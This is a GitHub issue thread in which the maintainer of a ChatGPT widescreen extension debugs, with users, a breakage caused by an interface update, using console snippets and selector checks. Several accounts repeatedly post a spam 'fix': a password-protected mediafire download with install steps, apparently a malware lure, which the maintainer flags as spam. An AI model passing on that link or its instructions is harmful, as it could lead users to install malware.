### ISSUE TITLE
Issue with chat gpt update?

### ISSUE THREAD

**Issue by svan-b** [adamlui/chatgpt-apps#75]
Hi Adam, love your extension; however, today I am no longer able to use the extension. I have added and removed it multiple times and still no luck. 

<img width="852" alt="image" src="https://github.com/user-attachments/assets/6e09597f-2f59-4763-8bc3-07c164724536">

**Comment by adamlui** [comment]
Hey @svan-b you are the 2nd person to say this, but it still works for me, can you show the console (Ctrl+Shift+J in Chrome, Ctrl+Shift+K in Firefox) so I can see possible errors

**Comment by svan-b** [comment]
<img width="332" alt="image" src="https://github.com/user-attachments/assets/7fd00992-3c44-48ab-9532-433a3aa39e8e">

**Comment by adamlui** [comment]
Ok it looks like they updated the sidebar for you, in console can you paste this

```document.querySelector('#__next > div > div')```

and confirm it returns null

**Comment by svan-b** [comment]
@adamlui 

Correct

<img width="352" alt="image" src="https://github.com/user-attachments/assets/d2b588d7-0dec-4e7a-a117-352e0589b5df">

**Comment by adamlui** [comment]
It looks there is no more sidebar? Can you get the sidebar to appear? If so, can you right-click on it and Inspect Element so I can see the code for it

**Comment by adamlui** [comment]
Oh I see you still have sidebar since i see the scrollbar for it, I just need to know how it got updated so I can correct the selector

**Comment by svan-b** [comment]
Sidebar is there

body > div.relative.flex.h-full.w-full.overflow-hidden.transition-colors.z-0 > div.flex-shrink-0.overflow-x-hidden.bg-token-sidebar-surface-primary > div > div > div > nav > div.flex-col.flex-1.transition-opacity.duration-500.relative.-mr-2.pr-2.overflow-y-auto

**Comment by adamlui** [comment]
Can you take a screenshot like for the old one it is

![image](https://github.com/user-attachments/assets/5c6ec8ee-59cc-462a-8416-2496cd6b2509)

So when you right-click > inspect it, that line of code should highlight in your sccreenshot, and include all the way up to <body> like this shot

**Comment by svan-b** [comment]
<img width="957" alt="image" src="https://github.com/user-attachments/assets/e6ff3603-9c7c-4fff-8a76-574f9cda0023">

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by adamlui** [comment]
@rajnikyadav what's that a virus

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by adamlui** [comment]
@svan-b ignore the spammers, actually can you open Console then keep toggling the sidebar on and off, do you see a line that changes, can you screenshot that line

**Comment by svan-b** [comment]
This one does, but so do a few other lines

<img width="959" alt="image" src="https://github.com/user-attachments/assets/c3bc9df5-97c8-4159-8532-55617ba70c2a">

**Comment by svan-b** [comment]
<img width="926" alt="image" src="https://github.com/user-attachments/assets/0d35c0c5-3498-4ab3-bdfd-6402b83385cf">

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by adamlui** [comment]
Ok @svan-b can you paste this in the console and hit Enter

```js
        
const sidebar = {
    hide: function() { this.isOn() ? this.toggle() : console.info('Sidebar already hidden!'); },
    show: function() { this.isOff() ? this.toggle() : console.info('Sidebar already shown!'); },
    isOff: function() { return !this.isOn(); },
    isOn: function() {
        const sidebar = document.querySelector('body script + div > div');
        return sidebar.style.visibility != 'hidden' && sidebar.style.width != '0px';
    },

    toggle: function() {
        const navBtnSelector = 'nav button',
              isToggleBtn = btn => btn.querySelectorAll('svg path[d*="M8.857 3h6.286c1.084"]').length > 0;
        for (const btn of document.querySelectorAll(navBtnSelector))
            if (isToggleBtn(btn)) { btn.click(); return; }
    }
}
```

Then test each of these functions by typing it and pressing Enter, one at a time, and tell me if they all work

`sidebar.hide()`
`sidebar.show()`
`sidebar.isOff()`
`sidebar.isOn()`
`sidebar.toggle()`

**Comment by svan-b** [comment]
Here you go. For now I must go, I can help debug tomorrow. Thanks

<img width="475" alt="image" src="https://github.com/user-attachments/assets/ee2bd62c-fec6-4eeb-bd81-63bc07cf097a">

**Comment by adamlui** [comment]
Ok it looks like detection works but hiding doesn't, tomorrow if you could inspect the sidebar toggle button then I can update the SVG selector too

**Comment by Jeff-Zzh** [comment]
same issue and same test result

**Comment by adamlui** [comment]
@Jeff-Zzh can you inspect the toggle button element so I can update the SVG path selector. The first two groups of the `d=""` should be something like `M8.857 3h6.286c1.084 `

**Comment by Jeff-Zzh** [comment]
@adamlui how should I do，now I'm in this page 
![image](https://github.com/user-attachments/assets/162a5c97-3731-4f16-ace6-0af92fbc5898)

**Comment by adamlui** [comment]
@Jeff-Zzh is there a ChatGPT button to hide the sidebar? If so, right-click it > left-click inspect, then right-click the line beginning `<svg` then left-click Copy outer HTML then paste here

**Comment by Jeff-Zzh** [comment]
yes, it's amazing that after I flash the web page , the button show again，
![image](https://github.com/user-attachments/assets/211c3f37-1549-40bc-94d8-fc8938570765)
![image](https://github.com/user-attachments/assets/9805bb92-337b-48e6-be75-28316722b737)
I think this is what you want :)
<div id="wideScreen-button" class="mb-1 me-1 flex h-8 w-8 items-center justify-center rounded-full bg-black text-white transition-colors hover:opacity-70 focus-visible:outline-none focus-visible:outline-black disabled:text-[#f4f4f4] disabled:hover:opacity-100 dark:bg-white dark:text-black dark:focus-visible:outline-white disabled:dark:bg-token-text-quaternary dark:disabled:text-token-main-surface-secondary disabled:bg-[#D7D7D7]" style="position: relative; top: 0px; right: -30px; cursor: pointer; background-color: transparent; border-color: transparent;"><svg height="18" class="icon-2xl" viewBox="8 8 20 20" style="pointer-events: none; width: 1.3rem; height: 1.3rem;"><path fill="#202123" fill-rule="evenodd" d="m26,13 0,10 -16,0 0,-10 z m-14,2 12,0 0,6 -12,0 0,-6 z"></path></svg></div>

<svg height="18" class="icon-2xl" viewBox="8 8 20 20" style="pointer-events: none; width: 1.3rem; height: 1.3rem;"><path fill="#202123" fill-rule="evenodd" d="m26,13 0,10 -16,0 0,-10 z m-14,2 12,0 0,6 -12,0 0,-6 z"></path></svg>

and the button appears and it works, very happy I can use this again :smiley:

**Comment by Jeff-Zzh** [comment]
<div id="wideScreen-button" class="mb-1 me-1 flex h-8 w-8 items-center justify-center rounded-full bg-black text-white transition-colors hover:opacity-70 focus-visible:outline-none focus-visible:outline-black disabled:text-[#f4f4f4] disabled:hover:opacity-100 dark:bg-white dark:text-black dark:focus-visible:outline-white disabled:dark:bg-token-text-quaternary dark:disabled:text-token-main-surface-secondary disabled:bg-[#D7D7D7]" style="position: relative; top: 0px; right: -30px; cursor: pointer; background-color: transparent; border-color: transparent;"><svg height="18" class="icon-2xl" viewBox="8 8 20 20" style="pointer-events: none; width: 1.3rem; height: 1.3rem;"><path fill="#202123" fill-rule="evenodd" d="m26,13 0,10 -16,0 0,-10 z m-14,2 12,0 0,6 -12,0 0,-6 z"></path></svg></div>

**Comment by Jeff-Zzh** [comment]
<svg height="18" class="icon-2xl" viewBox="8 8 20 20" style="pointer-events: none; width: 1.3rem; height: 1.3rem;"><path fill="#202123" fill-rule="evenodd" d="m26,13 0,10 -16,0 0,-10 z m-14,2 12,0 0,6 -12,0 0,-6 z"></path></svg>

**Comment by adamlui** [comment]
That's my button, can you inspect OpenAI's button (they copied it from me when I first released this extension)

![image](https://github.com/user-attachments/assets/edcde96a-ec7d-45b2-a260-ff6b1bf177fa)

**Comment by Jeff-Zzh** [comment]
I‘ve copyed the outerHTML on the comment, but it dosen't show, I screenshot for you
![image](https://github.com/user-attachments/assets/7bd10654-ba7a-44da-8c3f-dc59d386c2fb)

**Comment by Jeff-Zzh** [comment]
sure can, this is the inspection OpenAI's button html
![image](https://github.com/user-attachments/assets/1bbb14fa-6a0b-4845-b865-62a872a6eed5)
<svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" fill="none" viewBox="0 0 24 24" class="icon-xl-heavy"><path fill="currentColor" fill-rule="evenodd" d="M8.857 3h6.286c1.084 0 1.958 0 2.666.058.729.06 1.369.185 1.961.487a5 5 0 0 1 2.185 2.185c.302.592.428 1.233.487 1.961.058.708.058 1.582.058 2.666v3.286c0 1.084 0 1.958-.058 2.666-.06.729-.185 1.369-.487 1.961a5 5 0 0 1-2.185 2.185c-.592.302-1.232.428-1.961.487C17.1 21 16.227 21 15.143 21H8.857c-1.084 0-1.958 0-2.666-.058-.728-.06-1.369-.185-1.96-.487a5 5 0 0 1-2.186-2.185c-.302-.592-.428-1.232-.487-1.961C1.5 15.6 1.5 14.727 1.5 13.643v-3.286c0-1.084 0-1.958.058-2.666.06-.728.185-1.369.487-1.96A5 5 0 0 1 4.23 3.544c.592-.302 1.233-.428 1.961-.487C6.9 3 7.773 3 8.857 3M6.354 5.051c-.605.05-.953.142-1.216.276a3 3 0 0 0-1.311 1.311c-.134.263-.226.611-.276 1.216-.05.617-.051 1.41-.051 2.546v3.2c0 1.137 0 1.929.051 2.546.05.605.142.953.276 1.216a3 3 0 0 0 1.311 1.311c.263.134.611.226 1.216.276.617.05 1.41.051 2.546.051h.6V5h-.6c-1.137 0-1.929 0-2.546.051M11.5 5v14h3.6c1.137 0 1.929 0 2.546-.051.605-.05.953-.142 1.216-.276a3 3 0 0 0 1.311-1.311c.134-.263.226-.611.276-1.216.05-.617.051-1.41.051-2.546v-3.2c0-1.137 0-1.929-.051-2.546-.05-.605-.142-.953-.276-1.216a3 3 0 0 0-1.311-1.311c-.263-.134-.611-.226-1.216-.276C17.029 5.001 16.236 5 15.1 5zM5 8.5a1 1 0 0 1 1-1h1a1 1 0 1 1 0 2H6a1 1 0 0 1-1-1M5 12a1 1 0 0 1 1-1h1a1 1 0 1 1 0 2H6a1 1 0 0 1-1-1" clip-rule="evenodd"></path></svg>

**Comment by adamlui** [comment]
Ok can you click the triangle, then the first `<path d=""` I need to see the `d=""`

**Comment by Jeff-Zzh** [comment]
I have also refreshed web page many times before, your button still does not show, but the last time I refreshed it, the buttons showed up

**Comment by Jeff-Zzh** [comment]
![image](https://github.com/user-attachments/assets/55401066-d0a4-44eb-b7d5-cfda164326ce)
yes, looks like this

**Comment by adamlui** [comment]
Oh it moved then, can you paste the surrounding code

**Comment by adamlui** [comment]
It used to be here

![image](https://github.com/user-attachments/assets/20f3e20d-6843-4a61-8cd4-75e681294c44)

Can you patse something similar showing all the ancesotrs up to `<body>`

**Comment by Jeff-Zzh** [comment]
![image](https://github.com/user-attachments/assets/d3f29beb-1be6-492b-801b-d827206d9a99)
![image](https://github.com/user-attachments/assets/449904c3-0988-451a-afe3-8ab1c1acd899)
is this OK? I need to do some work now, thanks for answering me :)

**Comment by adamlui** [comment]
Yes but can you try pasting this again

```js
        
const sidebar = {
    hide: function() { this.isOn() ? this.toggle() : console.info('Sidebar already hidden!'); },
    show: function() { this.isOff() ? this.toggle() : console.info('Sidebar already shown!'); },
    isOff: function() { return !this.isOn(); },
    isOn: function() {
        const sidebar = document.querySelector('body script + div > div');
        return sidebar.style.visibility != 'hidden' && sidebar.style.width != '0px';
    },

    toggle: function() {
        const navBtnSelector = 'nav button',
              isToggleBtn = btn => btn.querySelector('svg path[d*="M8.857 3h6.286c1.084"]');
        for (const btn of document.querySelectorAll(navBtnSelector))
            if (isToggleBtn(btn)) { btn.click(); return; }
    }
}

```

When you type `sidebar.toggle()` > Enter , does the sidebar show and hide?

**Comment by Jeff-Zzh** [comment]
@adamlui yes,when I type `sidebar.toggle()`, the siderbar show or hide successfully :)

**Comment by adamlui** [comment]
Ok I updated chatgpt.js accordingly, now I am bumping it in the million apps that use it, then I will publish to Chrome store and it should auto-update sometime today

**Comment by svan-b** [comment]
Hi @adamlui, any luck here? I should probably try and remove it and install it again to see.

**Comment by adamlui** [comment]
@svan-b yes if you don't have version 2024.2.28 can you re-install or click update all extensions. Does it not work? Can you show the console?

**Comment by svan-b** [comment]
Not working at the moment

<img width="1917" alt="image" src="https://github.com/user-attachments/assets/2437f7e4-93a9-49de-8992-2799a67dacca">

**Comment by adamlui** [comment]
@svan-b can you raise the console so I can see the errors

**Comment by svan-b** [comment]
here sorry

<img width="1698" alt="image" src="https://github.com/user-attachments/assets/6f58fbe2-4bde-49e8-8047-f0e136f80d38">

**Comment by adamlui** [comment]
Thank you @svan-b , I have to fix some stuff w/ minify.js, then chatgpt.js, then Widescreen can be fixed, then published again so it will take a while and if you can be patient he fixing auto-update will probably be tomorrow instead

**Comment by svan-b** [comment]
No problem, thanks for your attention

**Comment by adamlui** [comment]
hey @svan-b did you update

**Comment by svan-b** [comment]
Hi @adamlui sorry for the delay, yes it works fine thank you
